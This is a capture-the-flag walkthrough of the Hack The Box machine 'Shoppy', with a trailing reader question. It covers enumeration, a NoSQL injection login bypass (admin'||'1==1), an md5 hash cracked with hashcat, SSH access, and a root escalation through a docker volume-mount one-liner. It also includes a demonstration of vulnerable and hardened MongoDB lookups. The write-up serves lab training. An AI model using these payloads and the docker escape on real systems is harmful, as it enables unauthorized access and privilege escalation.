Hack The Box. Walkthrough Shoppy. NoSQL injection and vulnerability in docker
An nmap -sV -sC scan showed:
port 22: OpenSSH
port 80: nginx 1.23.1: redirects to http://shoppy.htb
Let's add the machine's IP address and shoppy.htb to /etc/hosts so the redirect resolves in the browser.
Vhost via gobuster:
While nmap is still running, we use gobuster to look for potential subdomains that could give us additional entry points.
gobuster vhost -w /home/hell59/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 50 -u shoppy.htb
Manually explore the web application:
We manually examine the source code of the application.
We do not find anything but a timer.
Search for files and directories:
Let’s look for directories and files, maybe we’ll find something interesting.
wfuzz -c -z file,/hell59/SecLists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "http://shoppy.htb/FUZZ/"
We see that there is an /admin path, which takes us to /login:
Looking at the authentication, we infer that the backend is a MongoDB NoSQL database.
We can log in using the following NoSQL injection logic:
login: admin'||'1==1 password: admin
You can read about NoSQL injections here: https://book.hacktricks.xyz/pentesting-web/nosql-injection .
admin'||'1==1 and we get the list of users and the hash.
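To show why the admin'||'1==1 payload works, here is an added example (not the box's real application code): it emulates a login lookup that concatenates the username into a MongoDB $where clause, next to a hardened lookup that uses a plain equality filter. The in-memory user list, the hash strings and the assumption that the app builds its filter as a string are all constructed for the demonstration.

```javascript
// Constructed sample "collection"; hashes are placeholders, not real values.
const users = [
  { username: 'admin', passwordHash: '<constructed-md5-admin>' },
  { username: 'josh', passwordHash: '<constructed-md5-josh>' },
];

// Vulnerable pattern: user input is concatenated into a $where clause,
// i.e. { $where: "this.username == '" + name + "'" }.
// MongoDB evaluates $where as JavaScript against every document, so the
// payload admin'||'1==1 turns the clause into
//   this.username == 'admin' || '1==1'
// which is truthy for every document: the whole user list (with hashes) leaks.
function vulnerableLookup(name) {
  const clause = `this.username == '${name}'`;
  // Emulate server-side $where evaluation with `this` bound to each document.
  const predicate = new Function('return (' + clause + ');');
  return users.filter((doc) => predicate.call(doc));
}

// Hardened pattern: reject anything that is not a plain string (this also
// blocks operator objects such as {"$ne": ""} arriving from a JSON body) and
// match by exact equality, never by evaluating code.
function safeLookup(name) {
  if (typeof name !== 'string') {
    throw new TypeError('username must be a string');
  }
  return users.filter((doc) => doc.username === name);
}

// Quick demonstration when run directly.
console.log('vulnerable, injected:', vulnerableLookup("admin'||'1==1").map((u) => u.username));
console.log('hardened,   injected:', safeLookup("admin'||'1==1").map((u) => u.username));
```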
Use hashcat to crack the resulting md5 hash:
Let’s use hashcat with the rockyou.txt dictionary and look at the results:
Log in to the subdomain.
Now go to the mattermost subdomain after adding it to /etc/hosts,
http://www.mattermost.shoppy.htb, and log in with the obtained password.
Here is the user's chat history, in which we find important information about the machine's deployment:
Get the user flag:
With the obtained credentials, we log in via SSH, find the user.txt flag, and cat user.txt.
If you dig around and look closely at all the files in the password-manager, you can fish out the Sample password and supply it.
Thus, we get the username and password data:
Log in via SSH as deploy user.
Get the root flag:
We use the docker privilege escalation described here: https://gtfobins.github.io/gtfobins/docker/ .
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Hooray, we got root!
I don't see the authorization header; how did you determine it was MongoDB NoSQL?